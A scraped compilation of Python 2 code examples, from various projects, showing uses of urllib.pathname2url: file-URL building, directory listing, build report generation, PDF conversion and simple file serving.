def smokeTest(self):
     falseNegatives = 0.
     falsePositives = 0.
     pCount = 0.
     nCount = 0.
     for article in os.listdir(self.parentURL + "positive"):
         pCount += 1
         s = join(self.parentURL+"positive",article)
         result, resultString = self.evaluate(urllib.pathname2url(s))
         if result:
             continue
         else:
             falseNegatives += 1
     pError = falseNegatives / pCount
     print "Rate of False Negatives = ", pError*100.0
     for article in os.listdir(self.parentURL + "negative"):
         nCount += 1
         s = join(self.parentURL+"negative",article)
         result, resultString = self.evaluate(urllib.pathname2url(s))
         if not result:
             continue
         else:
             falsePositives += 1
     nError = falsePositives / nCount
     print "Rate of False Positives = ", nError*100.0
     accuracy = (((nCount - falsePositives) + (pCount - falseNegatives)) / (nCount + pCount))*100.0
     print "Total Accuracy = ", accuracy
     print falseNegatives
     print pCount
     print falsePositives
     print ncount
Beispiel #2
0
 def get_resource(self, url, hint=None):
   # Try to open as a local path
   try:
     handle = urllib.urlopen(urllib.pathname2url(url))
     return handle
   except IOError as e:
     pass
   # Try to open as an absolute path by combining 'hint' and 'url'
   if hint is not None:
     try:
       path = os.path.join(hint, url)
       handle = urllib.urlopen(urllib.pathname2url(path))
       return handle
     except IOError as e:
       pass
   # Case where input URL is not a local path
   try:
     handle = self.opener.open(url)
     return handle
   except IOError as e:
     pass
   if not hasattr(e, 'code') or e.code != 401:
     raise EnvironmentError(str(e.errno) + ": " + str(e.strerror))
   # Case where login / password are unknown
   else:
     username = str(raw_input("Username for " + url + ": "))
     password = getpass.getpass()
     self.manager.add_password(None, url, username, password)
     try:
       handle = self.opener.open(url)
       return handle
     except IOError as e:
       print(str(e.errno) + ": " + str(e.strerror))
Beispiel #3
0
    def buildUri(self):

        # Assign class variables from FitNesse arguments if they 
        # are not passed in from the row.
        if (not self.host): self.host = self.args[0]
        if (not self.updateVersion): self.updateVersion = self.args[1]
        if (not self.product): self.product = self.args[2]
        if (not self.version): self.version = self.args[3]
        if (not self.platform): self.platform = self.args[4]
        if (not self.locale): self.locale = self.args[5]
        if (not self.osVersion): self.osVersion = self.args[6]

        if (self.osVersion != "NULL"):
            url = '/'.join((self.host, 
                pathname2url('/'.join((self.updateVersion, self.product, self.version,
                            self.build, self.platform, self.locale,
                            self.channel, self.osVersion, self.dist, 
                            self.distVersion, "update.xml")))
                ))
        else:
            url = '/'.join((self.host, 
                pathname2url('/'.join((self.updateVersion, self.product, self.version,
                            self.build, self.platform, self.locale,
                            self.channel, "update.xml")))
                ))
        if (self.force == 'true'):
            url += '?force=1'

        if (self.newchannel != "NULL"):
            url += '?newchannel=' + self.newchannel

        return url
Beispiel #4
0
def dirlist(dir_path,url):
    import os
    import urlparse
    from urllib import pathname2url,url2pathname
             
    if not url.endswith("/"):
        url += "/"
    names = os.listdir(dir_path)
    dirs = [ name for name in names
        if os.path.isdir(os.path.join(dir_path,name)) ]
    files = [ name for name in names 
        if os.path.isfile(os.path.join(dir_path,name)) ]
    
    dirs.sort(lambda x,y:cmp(x.lower(),y.lower()))
    files.sort(lambda x,y:cmp(x.lower(),y.lower()))
    
    head = """<head>
    <title>Directory listing</title>
    <link rel="stylesheet" href="/karrigell.css">
    </head>"""
    body = "<H1>Contents of %s</H1>" %url    
    body += '<span class="cadre">-</span>'
    body += '<A href="../">parent directory</A>'
    for d in dirs:
        #body += '<BR>+<A href="%s">%s</A>\n' %(urlparse.urljoin(url,pathname2url(d)),d)
        body += '<BR><SPAN class="cadre">+</span>'
        body += '<A href="%s/">%s</A>\n' \
            %(urlparse.urljoin(url,pathname2url(d)),d) 

    for f in files:
        body += '<BR>&nbsp;<A href="%s">%s</A>\n' \
            %(urlparse.urljoin(url,pathname2url(f)),f)

    
    return '<html>%s <body>%s</body></html>' %(head,body)
Beispiel #5
0
def convert_to_pdf(filename, pdf_filename):
    # print filename, pdf_filename
    if filename.endswith("ods"):
        filter_name = "calc_pdf_Export"
    else:
        filter_name = "writer_pdf_Export"
    if sys.platform == 'win32':
        filename = ''.join(["file:", urllib.pathname2url(unicode(os.path.abspath(filename)).encode("utf8"))])
        pdf_filename = ''.join(["file:", urllib.pathname2url(unicode(os.path.abspath(pdf_filename)).encode("utf8"))])
        StarDesktop, objServiceManager, core_reflection = getOOoContext()
        document = StarDesktop.LoadComponentFromURL(
            filename,
            "_blank",
            0,
            MakePropertyValues(
                objServiceManager,
                [["ReadOnly", True],
                 ["Hidden", True]]))
        document.storeToUrl(
            pdf_filename,
            MakePropertyValues(
                objServiceManager,
                [["CompressMode", 1],
                 ["FilterName", filter_name]]))
        document.close(False)
    else:
        shutil.copy(filename, pdf_filename)
Beispiel #6
0
def check(tool, mainFD):
  checkFD=codecs.open(pj(args.reportOutDir, tool, "check.txt"), "w", encoding="utf-8")
  if not args.disableMakeCheck:
    # make check
    print("RUNNING make check\n", file=checkFD); checkFD.flush()
    if simplesandbox.call(["make", "-j", str(args.j), "check"], envvar=["PKG_CONFIG_PATH", "LD_LIBRARY_PATH"], shareddir=["."],
                          stderr=subprocess.STDOUT, stdout=checkFD)==0:
      result="done"
    else:
      result="failed"
  else:
    print("make check disabled", file=checkFD); checkFD.flush()
    result="done"

  foundTestSuiteLog=False
  testSuiteLogFD=codecs.open(pj(args.reportOutDir, tool, "test-suite.log.txt"), "w", encoding="utf-8")
  for rootDir,_,files in os.walk('.'): # append all test-suite.log files
    if "test-suite.log" in files:
      testSuiteLogFD.write('\n\n')
      testSuiteLogFD.write(open(pj(rootDir, "test-suite.log")).read())
      foundTestSuiteLog=True
  testSuiteLogFD.close()
  if not args.disableMakeCheck:
    print('<td class="%s"><span class="glyphicon glyphicon-%s"></span>&nbsp;'%("success" if result=="done" else "danger",
      "ok-sign alert-success" if result=="done" else "exclamation-sign alert-danger"), file=mainFD)
    print('  <a href="'+myurllib.pathname2url(pj(tool, "check.txt"))+'">'+result+'</a>', file=mainFD)
    if foundTestSuiteLog:
      print('  <a href="'+myurllib.pathname2url(pj(tool, "test-suite.log.txt"))+'">test-suite.log</a>', file=mainFD)
    print('</td>', file=mainFD)
  checkFD.close()
  mainFD.flush()

  if result!="done":
    return 1
  return 0
 def test_quoting(self):
     # Test automatic quoting and unquoting works for pathnam2url() and
     # url2pathname() respectively
     given = os.path.join("needs", "quot=ing", "here")
     expect = "needs/%s/here" % urllib.quote("quot=ing")
     result = urllib.pathname2url(given)
     self.assertEqual(expect, result,
                      "pathname2url() failed; %s != %s" %
                      (expect, result))
     expect = given
     result = urllib.url2pathname(result)
     self.assertEqual(expect, result,
                      "url2pathname() failed; %s != %s" %
                      (expect, result))
     given = os.path.join("make sure", "using_quote")
     expect = "%s/using_quote" % urllib.quote("make sure")
     result = urllib.pathname2url(given)
     self.assertEqual(expect, result,
                      "pathname2url() failed; %s != %s" %
                      (expect, result))
     given = "make+sure/using_unquote"
     expect = os.path.join("make+sure", "using_unquote")
     result = urllib.url2pathname(given)
     self.assertEqual(expect, result,
                      "url2pathname() failed; %s != %s" %
                      (expect, result))
def getRoUri(roref):
    uri = roref
    if urlparse.urlsplit(uri).scheme == "":
        base = "file://"+urllib.pathname2url(os.path.abspath(os.getcwd()))+"/"
        uri  = urlparse.urljoin(base, urllib.pathname2url(roref))
    if not uri.endswith("/"): uri += "/" 
    return rdflib.URIRef(uri)
Beispiel #9
0
def get_user_id(username, location):
    """Gets the user id for a particular user.

    Args:
        username: URL encoded username for the summoner.
        location: Riot abbreviation for the region.
    """

    try:
        LOGGING.push(
            "*'" + username + "'* from @'" + location +
            "'@ is requesting their user ID."
        )

        # TODO(Save the ID lookup in the database.)
        session = RiotSession(API_KEY, location)

        response = session.get_ids([urllib.pathname2url(username)])
        return response[urllib.pathname2url(username)]['id']

    # TODO(Fix this to catch both 429 and 400 errors w/ Riot Exception.)
    except ValueError:
        LOGGING.push(
            "Tried to get *'" + username +
            "'* id. Response did not have user id."
        )
        abort(404, {'message': "User ID was not found."})
Beispiel #10
0
 def generate_filename(self, title, content, date):
     if title:
         title = title.replace(' ', '-')
         return urllib.pathname2url(title)
     else:
         hash = hashlib.sha256(content + date).digest()
         return urllib.pathname2url(hash)
Beispiel #11
0
def create_input_source(source=None, publicID=None,
                        location=None, file=None, data=None, format=None):
    """
    Return an appropriate InputSource instance for the given
    parameters.
    """

    # TODO: test that exactly one of source, location, file, and data
    # is not None.

    input_source = None

    if source is not None:
        if isinstance(source, InputSource):
            input_source = source
        else:
            if isinstance(source, basestring):
                location = source
            elif hasattr(source, "read") and not isinstance(source, Namespace):
                f = source
                input_source = InputSource()
                input_source.setByteStream(f)
                if hasattr(f, "name"):
                    input_source.setSystemId(f.name)
            else:
                raise Exception("Unexpected type '%s' for source '%s'" %
                                (type(source), source))

    absolute_location = None  # Further to fix for issue 130

    if location is not None:
        # Fix for Windows problem https://github.com/RDFLib/rdflib/issues/145
        if os.path.exists(location):
            location = pathname2url(location)
        base = urljoin("file:", "%s/" % pathname2url(os.getcwd()))
        absolute_location = URIRef(location, base=base).defrag()
        if absolute_location.startswith("file:///"):
            filename = url2pathname(absolute_location.replace("file:///", "/"))
            file = open(filename, "rb")
        else:
            input_source = URLInputSource(absolute_location, format)
        # publicID = publicID or absolute_location # More to fix for issue 130

    if file is not None:
        input_source = FileInputSource(file)

    if data is not None:
        if isinstance(data, unicode):
            data = data.encode('utf-8')
        input_source = StringInputSource(data)

    if input_source is None:
        raise Exception("could not create InputSource")
    else:
        if publicID is not None:  # Further to fix for issue 130
            input_source.setPublicId(publicID)
        # Further to fix for issue 130
        elif input_source.getPublicId() is None:
            input_source.setPublicId(absolute_location or "")
        return input_source
Beispiel #12
0
                def handle_result_pixbuf(pixbuf, engine_uri, tooltip_image, tooltip_text, should_save):
                    if self.ticket.release(entry, ticket):
                        if should_save:
                            if pixbuf.get_has_alpha():
                                pixbuf.savev(
                                    art_location_png,
                                    ART_CACHE_FORMAT_PNG,
                                    ART_CACHE_SETTINGS_NAMES_PNG,
                                    ART_CACHE_SETTINGS_VALUES_PNG,
                                )
                                uri = "file://" + pathname2url(art_location_png)
                            else:
                                pixbuf.savev(
                                    art_location_jpg,
                                    ART_CACHE_FORMAT_JPG,
                                    ART_CACHE_SETTINGS_NAMES_JPG,
                                    ART_CACHE_SETTINGS_VALUES_JPG,
                                )
                                uri = "file://" + pathname2url(art_location_jpg)

                            self.write_meta_file(art_location_meta, tooltip_image, tooltip_text)
                        else:
                            uri = engine_uri

                        print "found image for %s" % (entry.get_string(RB.RhythmDBPropType.LOCATION))
                        callback(entry, pixbuf, uri, tooltip_image, tooltip_text)
                        for m in self.same_search.pop(entry, []):
                            print "and for same search %s" % (m.get_string(RB.RhythmDBPropType.LOCATION))
                            callback(m, pixbuf, uri, tooltip_image, tooltip_text)

                    self.write_blist(blist_location, blist)
                    self.same_search.pop(entry, None)
    def _set_url(self, wsdl):
        """ 
        Set the path of file-based wsdls for processing.If not file-based,
        return a fully qualified url to the WSDL
        """
        if self.fromurl == True:
            if wsdl.endswith('wsdl'):
                wsdl.replace('.wsdl','')
            qstring = '?WSDL=%s' % wsdl
            return 'https://%s:%s%s' % (self.hostname, self.port,
                                        ICONTROL_URI + qstring)

        else:

            if wsdl.endswith('wsdl'):
                pass
            else:
                wsdl = wsdl + '.wsdl'
        
            # Check for windows and use goofy paths. Otherwise assume *nix
            if platform.system().lower() == 'windows':
                url = 'file:' + pathname2url(self.directory +'\\' + wsdl)
            else:
                url = 'file:' + pathname2url(self.directory + '/' + wsdl)
        return url
Beispiel #14
0
    def update_submission(submission, status, job_id):
        """
        Updates the status of a submission.

        submission: The CompetitionSubmission object to update.
        status: The new status string: 'running', 'finished' or 'failed'.
        job_id: The job ID used to track the progress of the evaluation.
        """
        if status == 'running':
            _set_submission_status(submission.id, CompetitionSubmissionStatus.RUNNING)
            return Job.RUNNING

        if status == 'finished':
            result = Job.FAILED
            state = {}
            if len(submission.execution_key) > 0:
                logger.debug("update_submission_task loading state: %s", submission.execution_key)
                state = json.loads(submission.execution_key)
            if 'score' in state:
                logger.debug("update_submission_task loading final scores (pk=%s)", submission.pk)
                submission.output_file.name = pathname2url(submission_output_filename(submission))
                submission.save()
                logger.debug("Retrieving output.zip and 'scores.txt' file (submission_id=%s)", submission.id)
                ozip = ZipFile(io.BytesIO(submission.output_file.read()))
                scores = open(ozip.extract('scores.txt'), 'r').read()
                logger.debug("Processing scores... (submission_id=%s)", submission.id)
                for line in scores.split("\n"):
                    if len(line) > 0:
                        label, value = line.split(":")
                        try:
                            scoredef = SubmissionScoreDef.objects.get(competition=submission.phase.competition,
                                                                      key=label.strip())
                            SubmissionScore.objects.create(result=submission, scoredef=scoredef, value=float(value))
                        except SubmissionScoreDef.DoesNotExist:
                            logger.warning("Score %s does not exist (submission_id=%s)", label, submission.id)
                logger.debug("Done processing scores... (submission_id=%s)", submission.id)
                _set_submission_status(submission.id, CompetitionSubmissionStatus.FINISHED)
                # Automatically submit to the leaderboard?
                if submission.phase.is_blind:
                    logger.debug("Adding to leaderboard... (submission_id=%s)", submission.id)
                    add_submission_to_leaderboard(submission)
                    logger.debug("Leaderboard updated with latest submission (submission_id=%s)", submission.id)
                result = Job.FINISHED
            else:
                logger.debug("update_submission_task entering scoring phase (pk=%s)", submission.pk)
                url_name = pathname2url(submission_prediction_output_filename(submission))
                submission.prediction_output_file.name = url_name
                submission.save()
                try:
                    score(submission, job_id)
                    result = Job.RUNNING
                    logger.debug("update_submission_task scoring phase entered (pk=%s)", submission.pk)
                except Exception:
                    logger.exception("update_submission_task failed to enter scoring phase (pk=%s)", submission.pk)
            return result

        if status != 'failed':
            logger.error("Invalid status: %s (submission_id=%s)", status, submission.id)
        _set_submission_status(submission.id, CompetitionSubmissionStatus.FAILED)
Beispiel #15
0
def setup_psd_pregenerated(workflow, tags=[]):
    '''
    Setup CBC workflow to use pregenerated psd files.
    The file given in cp.get('workflow','pregenerated-psd-file-(ifo)') will 
    be used as the --psd-file argument to geom_nonspinbank, geom_aligned_bank
    and pycbc_plot_psd_file.

    Parameters
    ----------
    workflow: pycbc.workflow.core.Workflow
        An instanced class that manages the constructed workflow.
    tags : list of strings
        If given these tags are used to uniquely name and identify output files
        that would be produced in multiple calls to this function.

    Returns
    --------
    psd_files : pycbc.workflow.core.FileList
        The FileList holding the gating files
    '''
    psd_files = FileList([])

    cp = workflow.cp
    global_seg = workflow.analysis_time
    user_tag = "PREGEN_PSD"

    # Check for one psd for all ifos
    try:
        pre_gen_file = cp.get_opt_tags('workflow-psd',
                        'psd-pregenerated-file', tags)
        pre_gen_file = resolve_url(pre_gen_file)
        file_url = urlparse.urljoin('file:',
                                     urllib.pathname2url(pre_gen_file))
        curr_file = File(workflow.ifos, user_tag, global_seg, file_url,
                                                    tags=tags)
        curr_file.PFN(file_url, site='local')
        psd_files.append(curr_file)
    except ConfigParser.Error:
        # Check for one psd per ifo
        for ifo in workflow.ifos:
            try:
                pre_gen_file = cp.get_opt_tags('workflow-psd',
                                'psd-pregenerated-file-%s' % ifo.lower(),
                                tags)
                pre_gen_file = resolve_url(pre_gen_file)
                file_url = urlparse.urljoin('file:',
                                             urllib.pathname2url(pre_gen_file))
                curr_file = File(ifo, user_tag, global_seg, file_url,
                                                            tags=tags)
                curr_file.PFN(file_url, site='local')
                psd_files.append(curr_file)

            except ConfigParser.Error:
                # It's unlikely, but not impossible, that only some ifos
                # will have pregenerated PSDs
                logging.warn("No psd file specified for IFO %s." % (ifo,))
                pass
            
    return psd_files
 def _get_base_url(self, scheme, host, port, file_path):
     if netutils.is_valid_ipv6(host):
         base_url = "%s://[%s]:%s/folder/%s" % (scheme, host, port,
                                             urllib.pathname2url(file_path))
     else:
         base_url = "%s://%s:%s/folder/%s" % (scheme, host, port,
                                           urllib.pathname2url(file_path))
     return base_url
Beispiel #17
0
 def _get_base_url(self, scheme, host, port, file_path):
     if netutils.is_valid_ipv6(host):
         base_url = "{0!s}://[{1!s}]:{2!s}/folder/{3!s}".format(scheme, host, port,
                                             urllib.pathname2url(file_path))
     else:
         base_url = "{0!s}://{1!s}:{2!s}/folder/{3!s}".format(scheme, host, port,
                                           urllib.pathname2url(file_path))
     return base_url
Beispiel #18
0
def test_post_filename():

    content = 'some stuff in here'
    title = 'this is awesome'
    post = Post(content, prefix=prefix, author=author)
    expected = urllib.pathname2url(hashlib.sha256(content + post.meta['date']).digest())
    assert post.filename == expected, 'filename is %s expected %s' % (post.filename, expected)
    post = Post(content, prefix=prefix, title=title, author=author)
    assert post.filename == urllib.pathname2url(title.replace(' ', '-'))
    def parse_grabbed(self, url, item, datestr=u'2014-07-18T11:20:24+00:00'):
        """
        Parse grabbed item, extract title content, tags
        THIS IS THE METHOD YOU HAVE TO MODIFY FIRST TO GET THIS THING WORKING
        """
        raw_data = item['raw_content']
        parsd = PyQuery(raw_data)
        content_el = parsd('div.entry-content')
        if not content_el:
            content_el = parsd('.post-content')
        content = content_el.html()
        title = parsd('h1').html()
        tags = []
        for raw_tag in parsd('ul.tag-list>li>a'):
            tag = {'title':raw_tag.text,
                   'slug':urllib.pathname2url(
                       raw_tag.attrib['href'].split('/')[-1].encode('utf8')
                    )
                }
            tags.append(tag)
        raw_posted_date = parsd('header .entry-meta time.entry-date')
        if raw_posted_date:
            raw_posted_date_text = raw_posted_date[0].attrib['datetime']
        else:
            print "Failed to parse date!"
            raw_posted_date_text=datestr
        print "Setting post date: {}".format(raw_posted_date_text)
        posted_date = datetime.datetime.strptime(raw_posted_date_text[:-6],"%Y-%m-%dT%H:%M:%S")
        raw_category = None
        for potential_category in parsd('a'):
            if potential_category.attrib.get('rel'):
                if 'tag' in potential_category.attrib.get('rel'):
                    raw_category = potential_category
                    break
        if raw_category:
            category = {'title':raw_category.text,
                        'slug':urllib.pathname2url(
                            raw_category.attrib['href'].split('/')[-1].encode('utf8')
                        )}
        else:
            category = None
        author_raw = parsd('header vcard>a')
        author = author_raw[0].text if author_raw else None

        Posts.update({'url':url},{'$set':{
            'slug':url.split('/')[-1],
            'content':content,
            'title':title,
            'tags':tags,
            'posted_date':posted_date,
            'category':category,
            'author':author,
            'parsed':True
        }})
        self.parsedurls += 1
        time.sleep(1)
        return Posts.find_one({'url':url})
Beispiel #20
0
def generate_capture(exepath, html_path, img_path):
    """  HTML画面キャプチャを取得し、png形式で出力。

    * exepath: コマンド
    * html_path: HTMLファイルパス
    * img_path: 結果出力パス
    """

    timeout = 10

    try:
        if IS_WINDOWS:
            page_uri = 'file:%s' % urllib.pathname2url(os.path.normpath(html_path))
            exepath += '.exe'
            cmd = [exepath, '--url=%s' % page_uri, '--out=%s' % img_path, '--max-wait=%s' % 30000]
            proc = subprocess.Popen(cmd, creationflags=CREATE_NO_WINDOW, bufsize=-1)
        else:
            page_uri = 'file://%s' % urllib.pathname2url(os.path.normpath(html_path))
            exepath += '64' if '64' in platform.machine() else ''
            #if os.getenv('DISPLAY'):
            cmd = [exepath, '--url=%s' % page_uri, '--out=%s' % img_path, '--max-wait=%s' % 30000]
            #else:
            #    cmd = ['xvfb-run', '-s', '-screen 0, 1024x768x24', exepath, '--url=%s' % page_uri, '--out=%s' % img_path]
            proc = subprocess.Popen(cmd, bufsize=-1)
        st = time.time()
        while time.time() - st <= timeout:
            if proc.poll() is not None:
                try:
                    triming(img_path)
                except:
                    raise
                finally:
                    return True
            else:
                time.sleep(0.1)

        logger.debug('dead process %s' % proc.pid)
        try:
            proc.terminate()
        except:
            logger.debug(traceback.format_exc())

        time.sleep(1)
        if proc.poll() is not None:
            try:
                proc.kill()
            except:
                logger.debug(traceback.format_exc())

        return False
    except:
        logger.debug(traceback.format_exc())
        #logger.debug('exepath = %s' % (exepath))
        #logger.debug('Error occured while tring to generate capture for %s -> %s' % (html_path, img_path))
        raise
Beispiel #21
0
 def getUrlPath(self, source):
     path = self.__makepath(source)
     # logger.debug(path)
     try:
         upath = urllib.pathname2url(str(path))
     except UnicodeEncodeError:
         upath = urllib.pathname2url(path.encode('utf-8'))
     if upath[:3]=='///':
         return 'file:' + upath
     else:
         return 'file://' + upath
Beispiel #22
0
 def get(self):
     path = self.request.path
     icon_pattern = re.compile("^\/%s\/([0-9]+)$" % file_list.get_icon_dir())
     file_pattern = re.compile("^\/%s\/([0-9]+)$" % file_list.get_file_dir())
     # Delivering content
     if (path == "/") or (path == "/index.html"):
         data = file_list.get_html
         self.set_header('Content-Type', 'text/html')
         self.set_header('Content-Length', '{0}'.format(len(data)))
         self.write(data)
         self.finish()
     elif icon_pattern.match(path):
         try:
             head, index_string = os.path.split(path)
             index = int(index_string)
             file_path = file_list.get_icon_path_for_index(index)
             url = urllib.pathname2url(file_path)
             mime_type, encoding = mimetypes.guess_type(url)
             if mime_type == "image/svg+xml" or mime_type == "image/svg":
                 data = svg_to_png(file_path)
                 mime_type = "image/png"
             else:
                 f = open(file_path)
                 data = f.read()
                 f.close()
             if mime_type is not None:
                 self.set_header('Content-Type', mime_type)
             self.set_header('Content-Length', '{0}'.format(len(data)))
             self.write(data)
             self.finish()
         except IOError:
             self.send_file_not_found_error()
     elif file_pattern.match(path):
         try:
             head, index_string = os.path.split(path)
             index = int(index_string)
             file_path = file_list.get_file_path_for_index(index)
             head, filename = os.path.split(file_path)
             url = urllib.pathname2url(file_path)
             mime_type, encoding = mimetypes.guess_type(url)
             if mime_type is None:
                 mime_type = "application/octet-stream"
             f = open(file_path)
             data = f.read()
             self.set_header('Content-Type', mime_type)
             self.set_header('Content-Length', '{0}'.format(len(data)))
             self.set_header('Content-Disposition', 'attachment;filename="{0}";'.format(filename))
             self.write(data)
             self.finish()
             f.close()
         except IOError:
             self.send_file_not_found_error()
     else:
         self.send_file_not_found_error()
Beispiel #23
0
 def setUp(self):
     fd1, self.filename1 = mkstemp(suffix=self.serpar.EXTENSION,
                                   prefix="advene2_utest_serpar_")
     fd2 , self.filename2 = mkstemp(suffix=self.serpar.EXTENSION,
                                    prefix="advene2_utest_serpar_")
     fdopen(fd1).close()
     fdopen(fd2).close()
     self.url = "file:" + pathname2url(self.filename2)
     self.p1 = self.pkgcls("file:" + pathname2url(self.filename1),
                           create=True)
     self.p2 = None
 def getSearchItemURL(self, searchItem, page):
     url = "http://www.zhaoonline.com/search/"
     url += urllib.pathname2url(searchItem.name)
     url += "-8-3-trade-"
     url += urllib.pathname2url(str(categoryDic[searchItem.category]))
     url += "-"
     url += urllib.pathname2url(str(qualityDic[searchItem.quality]))
     url += "-00-N-0-N-1-"
     url += str(page)
     url += ".htm"
     return  url
Beispiel #25
0
def configure(tool, mainFD):
  if not os.path.isdir(pj(args.reportOutDir, tool)): os.makedirs(pj(args.reportOutDir, tool))
  configureFD=codecs.open(pj(args.reportOutDir, tool, "configure.txt"), "w", encoding="utf-8")
  copyConfigLog=False
  savedDir=os.getcwd()
  try:
    if not args.disableConfigure:
      # pre configure
      os.chdir(pj(args.sourceDir, srcTool(tool)))
      print("\n\nRUNNING aclocal\n", file=configureFD); configureFD.flush()
      if subprocess.call(["aclocal"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("aclocal failed")
      print("\n\nRUNNING autoheader\n", file=configureFD); configureFD.flush()
      if subprocess.call(["autoheader"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("autoheader failed")
      print("\n\nRUNNING libtoolize\n", file=configureFD); configureFD.flush()
      if subprocess.call(["libtoolize", "-c"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("libtoolize failed")
      print("\n\nRUNNING automake\n", file=configureFD); configureFD.flush()
      if subprocess.call(["automake", "-a", "-c"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("automake failed")
      print("\n\nRUNNING autoconf\n", file=configureFD); configureFD.flush()
      if subprocess.call(["autoconf"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("autoconf failed")
      print("\n\nRUNNING autoreconf\n", file=configureFD); configureFD.flush()
      if subprocess.call(["autoreconf"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("autoreconf failed")
      # configure
      os.chdir(savedDir)
      os.chdir(pj(args.sourceDir, buildTool(tool)))
      copyConfigLog=True
      print("\n\nRUNNING configure\n", file=configureFD); configureFD.flush()
      if args.prefix==None:
        if subprocess.call(["./config.status", "--recheck"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("configure failed")
      else:
        command=[pj(args.sourceDir, srcTool(tool), "configure"), "--prefix", args.prefix]
        command.extend(args.passToConfigure)
        if subprocess.call(command, stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("configure failed")
    else:
      print("configure disabled", file=configureFD); configureFD.flush()

    result="done"
  except RuntimeError as ex:
    result=str(ex)
  if not args.disableConfigure:
    print('<td class="%s"><span class="glyphicon glyphicon-%s"></span>&nbsp;'%("success" if result=="done" else "danger",
      "ok-sign alert-success" if result=="done" else "exclamation-sign alert-danger"), file=mainFD)
    print('  <a href="'+myurllib.pathname2url(pj(tool, "configure.txt"))+'">'+result+'</a>', file=mainFD)
    if copyConfigLog:
      shutil.copyfile("config.log", pj(args.reportOutDir, tool, "config.log.txt"))
      print('  <a href="'+myurllib.pathname2url(pj(tool, "config.log.txt"))+'">config.log</a>', file=mainFD)
    print('</td>', file=mainFD)
  configureFD.close()
  mainFD.flush()
  os.chdir(savedDir)

  if result!="done":
    return 1
  return 0
Beispiel #26
0
  def zoomify_add_image(self, filename, width, height, bands, pixel_format):
    from hashlib import sha256
    import urllib

    import voxel_globe.meta.models

    hasher = sha256()
    chunk = 1024*1024*16

    with open(filename, 'rb') as fid:
      data = fid.read(chunk)
      while data:
        hasher.update(data)
        data = fid.read(chunk)
    zoomify_name = os.path.join(os.path.split(filename)[0], hasher.hexdigest()+'_zoomify')
    #zoomify_name = os.path.splitext(filename)[0] + '_zoomify'
    pid = Popen(['vips', 'dzsave', filename, zoomify_name, '--layout', 
                 'zoomify'])
    pid.wait()

    #convert the slashes to URL slashes 
    relative_file_path = urllib.pathname2url(os.path.relpath(filename, 
        env['VIP_IMAGE_SERVER_ROOT']))
    basename = os.path.split(filename)[-1]
    relative_zoom_path = urllib.pathname2url(os.path.relpath(zoomify_name, 
        env['VIP_IMAGE_SERVER_ROOT']))

    img = voxel_globe.meta.models.Image.create(
          name="%s Upload %s (%s) Frame %s" % (self.meta_name,
                                               self.upload_session.name, 
                                               self.upload_session.id, 
                                               basename), 
          imageWidth=width, imageHeight=height, 
          numberColorBands=bands, pixelFormat=pixel_format, fileFormat='zoom', 
          imageUrl='%s://%s:%s/%s/%s/' % (env['VIP_IMAGE_SERVER_PROTOCOL'], 
                                         env['VIP_IMAGE_SERVER_HOST'], 
                                         env['VIP_IMAGE_SERVER_PORT'], 
                                         env['VIP_IMAGE_SERVER_URL_PATH'], 
                                         relative_zoom_path),
          originalImageUrl='%s://%s:%s/%s/%s' % (
              env['VIP_IMAGE_SERVER_PROTOCOL'], 
              env['VIP_IMAGE_SERVER_HOST'], 
              env['VIP_IMAGE_SERVER_PORT'], 
              env['VIP_IMAGE_SERVER_URL_PATH'], 
              relative_file_path),
          service_id=self.task.request.id,
          original_filename=basename)
    img.save()
     
    self.image_collection.images.add(img)
    def get_cloud_folder(self):
        try:
            val = self.config.get("Advanced", "Folder")

            if val is None:
                return urlparse.urljoin(
                    'file:', urllib.pathname2url(
                        os.path.expanduser("~/MEOCloud")))
            else:
                return 'file://' + val.replace('file://', '')
        except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
            return urlparse.urljoin(
                'file:', urllib.pathname2url(
                    os.path.expanduser("~/MEOCloud")))
Beispiel #28
0
def load_file(spec_file, http_client=None):
    """Loads a spec file

    :param spec_file: Path to swagger.json.
    :param http_client: HTTP client interface.
    :return: validated json spec in dict form
    :raise: IOError: On error reading swagger.json.
    """
    file_path = os.path.abspath(spec_file)
    url = urlparse.urljoin(u'file:', urllib.pathname2url(file_path))
    # When loading from files, everything is relative to the spec file
    dir_path = os.path.dirname(file_path)
    base_url = urlparse.urljoin(u'file:', urllib.pathname2url(dir_path))
    return load_url(url, http_client=http_client, base_url=base_url)
    def send_move(self, old_file_path, new_file_path):
        try:
            self.log.debug('Sending MOVE to client' + self.computer_name)
            mess = "MOVE" + ' ' + pathname2url(old_file_path) + ' ' + pathname2url(new_file_path)

            self.connection.send(mess)

            # Wait for the recieve thread to send us a ok Event
            status = self.ok.wait(8.0)
            self.ok.clear()
            if not status:
                raise IOError(
                    'Did not recieve a response from the client.' + self.computer_name)
        except IOError, err:
            self.log.error(str(err))
Beispiel #30
0
    def report_simple_failure(self, scene, reference_filepath, output_filepath, log_filepath, error_message):
        self.failures += 1

        command = self.__make_update_command(output_filepath, reference_filepath)
        self.all_commands.append(command)

        self.file.write(self.__render(self.simple_failure_template,
                                      { 'project-path': scene,
                                        'ref-image-url': urllib.pathname2url(reference_filepath),
                                        'output-image-url': urllib.pathname2url(output_filepath),
                                        'failure-reason': error_message,
                                        'log-file-url': urllib.pathname2url(log_filepath),
                                        'log-file-path': os.path.basename(log_filepath),
                                        'update-command': command }))
        self.file.flush()
Beispiel #31
0
def path2url(path):
    return urljoin(
        'file:', pathname2url(os.path.abspath(path)))
Beispiel #32
0
def path2url(path):
    return urlparse.urljoin('file:', pathname2url(path))
Beispiel #33
0
def path2url(path):
    """URL-encode local path"""
    return urlparse.urljoin('file:', urllib.pathname2url(path.encode('utf-8')))
Beispiel #34
0

def get_person_id():
    person_id = ''
    extractId = str(sys.argv[1])[-2:]
    connect = sqlite3.connect("Face-DataBase")
    c = connect.cursor()
    cmd = "SELECT * FROM Students WHERE ID = " + extractId
    c.execute(cmd)
    row = c.fetchone()
    person_id = row[3]
    connect.close()
    return person_id


if len(sys.argv) is not 1:
    currentDir = os.path.dirname(os.path.abspath(__file__))
